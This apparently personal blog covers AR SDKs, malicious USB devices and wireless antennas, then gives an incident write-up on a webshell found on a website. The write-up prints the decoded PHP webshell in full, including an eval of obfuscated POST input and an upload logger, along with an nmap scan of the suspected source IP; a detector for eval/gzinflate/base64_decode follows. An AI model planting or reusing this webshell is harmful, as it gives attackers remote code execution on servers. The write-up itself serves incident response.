I was researching how to create a proprietary QR code for a personal project. I wanted a system where a unique QR code could redirect visitors to a website. But I soon realized that QR codes would soon be phased out. And then Google directed me to Augmented Reality! Eureka, this should be the future: image recognition to trigger a redirection. And so began the quest to find an SDK.
Requirements:
Allow creation of personal AR apps.
Work on Android and iOS
Review of Shortlisted AR SDKs
Aurasma:
- Payment needed for Skinned app or SDK per app license fees.
+ easy to use
+ well documented
+ community support
+ simple to design personal AR scenes (image targets & expected result)
Vuforia:
- Payment needed to use their Cloud storage feature for dynamic loading of targets
+ Free for SDK and creation of app without having Cloud feature
+ Average documentation (some of their sample apps are not updated to their latest SDK version)
+ community support
Wikitude:
- Payment based on image targets for SDK usage. ~ 3Euro per month for each image
+ Easy to create image target and response
ARToolKit:
- Steep learning curve; lacks sample applications to help users get started
+ Free to use
I settled for Vuforia, a somewhat free but usable solution. Using the sample application I began my first AR app within a night.
Saturday, September 21, 2013
Saturday, June 29, 2013
Malicious hardware devices
Now that many electronic devices are MIC (made in Cxxxx) and that they have a known hacking scene, are we safe from becoming another botnet in the world of crime?
The latest in the line is the iPhone charger malware PoC.
http://www.macworld.co.uk/ipad-iphone/news/?newsid=3450917
A very cool in-depth article on "Plug and Prey: Malicious USB Devices"
http://www.irongeek.com/i.php?page=security/plug-and-prey-malicious-usb-devices
And a very cool device, the "USB Rubber Ducky"
Next time, think twice before plugging in any new devices you buy, especially if they look as cute as the yellow ducky.
Saturday, June 1, 2013
Effective range of Wireless Router (dBi) antennas
Have you ever wondered what the antenna specifications on a wireless router mean (3dBi, 4dBi, 5dBi, ...)?
I was shopping for a wireless adapter; they tend to have many antenna configurations.
Amazon Alfa wireless usb adapter
Choose an antenna that meets your requirements.
9dBi dipole (1000m) ==> signal travels far at the same horizontal elevation as the transmission point
7dBi dipole (620m) ==> offers an optimal balance between range and elevation
5dBi dipole (500m) ==> covers a couple of levels of a building
2dBi dipole (300m) ==> if you are in a building and need to cover the rooms around you
More information if you are interested.
http://www.liveport.com/wireless-antenna-properties
Thursday, January 24, 2013
Discovery of Webshell on Website
Discovered unknown PHP files located on a website.
When a PHP file contains eval + gzinflate + base64_decode, expect it to be malicious in nature.
eval gzinflate base64_decode PHP decoder:
http://www.tareeinternet.com/scripts/decrypt.php
After decoding the file, we get a webshell with file upload capability.
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) { print $_GET['r']; }
elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); }
elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;
Update, 25 Jan 2013:
Findings from the log indicate that 3 months ago someone from 80.237.132.113 uploaded the webshell using an FTP account.
The possibility of entry via FTP brute force is very high, as I know the original password is not that complex.
80.237.132.113 is a webserver under construction.
80.237.132.113 could just be another victim of the intruder.
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
25/tcp open smtp Exim smtpd
80/tcp open http Apache httpd
110/tcp open pop3 Dovecot pop3d
137/tcp open netbios-ns?
138/tcp open netbios-dgm?
139/tcp open netbios-ssn?
143/tcp open imap Dovecot imapd
465/tcp open ssl/smtp Exim smtpd 4.X
587/tcp open smtp Exim
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
2195/tcp open unknown
3306/tcp open mysql MySQL 5.5.28-1~dotdeb.0-log
Mitigation:
Change password.
Monitor files.
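The eval + gzinflate + base64_decode pattern noted above can be flagged and unwrapped offline during file monitoring, without pasting a suspect file into a third-party decoder and without executing it. The Python below is an added example, not code from the original post; the function names and the embedded sample are constructed for illustration.

```python
import base64
import re
import zlib

# Hypothetical helper names; matches eval(gzinflate(base64_decode('...'))) in either quote style.
LAYER = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)""",
    re.IGNORECASE,
)
MARKERS = ("eval", "gzinflate", "base64_decode")


def is_suspicious(source: str) -> bool:
    """True when all three functions named in the post appear in one file."""
    lowered = source.lower()
    return all(marker in lowered for marker in MARKERS)


def peel(source: str, max_layers: int = 20, max_bytes: int = 5_000_000):
    """Statically unwrap nested layers; returns (layers_removed, final_source)."""
    layers = 0
    while layers < max_layers:
        m = LAYER.search(source)
        if not m:
            break
        raw = base64.b64decode(m.group(2))
        # PHP gzinflate() reads raw DEFLATE: negative wbits means no zlib header.
        d = zlib.decompressobj(-zlib.MAX_WBITS)
        out = d.decompress(raw, max_bytes)
        if d.unconsumed_tail:
            raise ValueError("layer exceeds max_bytes, possible decompression bomb")
        source = out.decode("utf-8", errors="replace")
        layers += 1
    return layers, source


def _constructed_layer(php: str) -> str:
    """Build one wrapped layer around a harmless statement (test data only)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    blob = base64.b64encode(c.compress(php.encode()) + c.flush()).decode()
    return f"eval(gzinflate(base64_decode('{blob}')));"


# Constructed sample: a harmless echo wrapped twice, since such files often nest layers.
SAMPLE = "<?php " + _constructed_layer(_constructed_layer("echo 'constructed sample';"))

if __name__ == "__main__":
    print(is_suspicious(SAMPLE), peel(SAMPLE))
```

Running is_suspicious over every .php file under the web root on a schedule, and peel on any hit, gives a readable final layer to review.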